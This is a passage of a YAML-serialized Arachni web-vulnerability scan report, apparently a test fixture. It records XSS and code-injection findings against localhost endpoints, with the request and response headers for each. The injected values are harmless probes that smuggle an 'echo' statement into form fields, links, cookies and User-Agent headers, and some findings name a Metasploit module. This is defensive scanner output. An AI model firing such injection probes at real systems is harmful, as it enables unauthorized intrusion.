      - body
      :train: 
      :format: 
      - 3
      :flip_param: true
      :injected_orig: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :combo: 
        cookie: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :action: http://localhost:11161/cookie/straight
      :match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    severity: High
    tags: 
    - xss
    - regexp
    - injection
    - script
    url: http://localhost:11161/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Client-side code (like JavaScript) can
        be injected into the web application which is then returned to the user's browser.
        This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
  elem: header
  internal_modname: XSS
  method: GET
  mod_name: XSS
  name: Cross-Site Scripting (XSS)
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being returned as part of the HTML code of a page.
  severity: High
  tags: 
  - xss
  - regexp
  - injection
  - script
  url: http://localhost:11161/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Client-side code (like JavaScript) can
          be injected into the web application which is then returned to the user's browser.
          This can lead to a compromise of the client's system or serve as a pivoting point for other attacks.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "88"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    internal_modname: XSS
    method: GET
    mod_name: XSS
    name: Cross-Site Scripting (XSS)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 3
      :flip_param: true
      :injected_orig: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :injected: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :combo: 
        User-Agent: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :action: http://localhost:11161/header/straight
      :match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being returned as part of the HTML code of a page.
    response: <some_dangerous_input_71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1/>
    severity: High
    tags: 
    - xss
    - regexp
    - injection
    - script
    url: http://localhost:11161/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/php/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;echo 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;echo 287630581954+4196403186331128;
      :altered: input
      :element: form
      :params: 
        input: ;echo 287630581954+4196403186331128;
      :follow_location: true
      :injected: ;echo 287630581954+4196403186331128;
      :combo: 
        input: ;echo 287630581954+4196403186331128;
      :action: http://localhost:11414/php/form/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/php/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/php/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;echo 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;echo 287630581954+4196403186331128;
      :altered: input
      :element: form
      :params: 
        input: default;echo 287630581954+4196403186331128;
      :follow_location: true
      :injected: default;echo 287630581954+4196403186331128;
      :combo: 
        input: default;echo 287630581954+4196403186331128;
      :action: http://localhost:11414/php/form/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/php/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/php/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;echo 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;echo 287630581954+4196403186331128;
      :altered: input
      :element: link
      :params: 
        input: ;echo 287630581954+4196403186331128;
      :follow_location: true
      :injected: ;echo 287630581954+4196403186331128;
      :combo: 
        input: ;echo 287630581954+4196403186331128;
      :action: http://localhost:11414/php/link/straight?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/php/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/php/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;echo 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;echo 287630581954+4196403186331128;
      :altered: input
      :element: link
      :params: 
        input: default;echo 287630581954+4196403186331128;
      :follow_location: true
      :injected: default;echo 287630581954+4196403186331128;
      :combo: 
        input: default;echo 287630581954+4196403186331128;
      :action: http://localhost:11414/php/link/append?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/php/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/php/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=%3Becho+287630581954%2B4196403186331128%3B;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;echo 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;echo 287630581954+4196403186331128;
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: ;echo 287630581954+4196403186331128;
      :injected: ;echo 287630581954+4196403186331128;
      :combo: 
        cookie: ;echo 287630581954+4196403186331128;
      :action: http://localhost:11414/php/cookie/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/php/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/php/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value%3Becho+287630581954%2B4196403186331128%3B
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: cookie value;echo 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;echo 287630581954+4196403186331128;
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value;echo 287630581954+4196403186331128;
      :injected: cookie value;echo 287630581954+4196403186331128;
      :combo: 
        cookie2: cookie value;echo 287630581954+4196403186331128;
      :action: http://localhost:11414/php/cookie/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/php/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/php/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: ;echo 287630581954+4196403186331128;
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;echo 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;echo 287630581954+4196403186331128;
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: ;echo 287630581954+4196403186331128;
      :injected: ;echo 287630581954+4196403186331128;
      :combo: 
        User-Agent: ;echo 287630581954+4196403186331128;
      :action: http://localhost:11414/php/header/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/php/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/php/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;echo 287630581954+4196403186331128;
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: arachni_user;echo 287630581954+4196403186331128;
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;echo 287630581954+4196403186331128;
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;echo 287630581954+4196403186331128;
      :injected: arachni_user;echo 287630581954+4196403186331128;
      :combo: 
        User-Agent: arachni_user;echo 287630581954+4196403186331128;
      :action: http://localhost:11414/php/header/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/php/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/perl/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
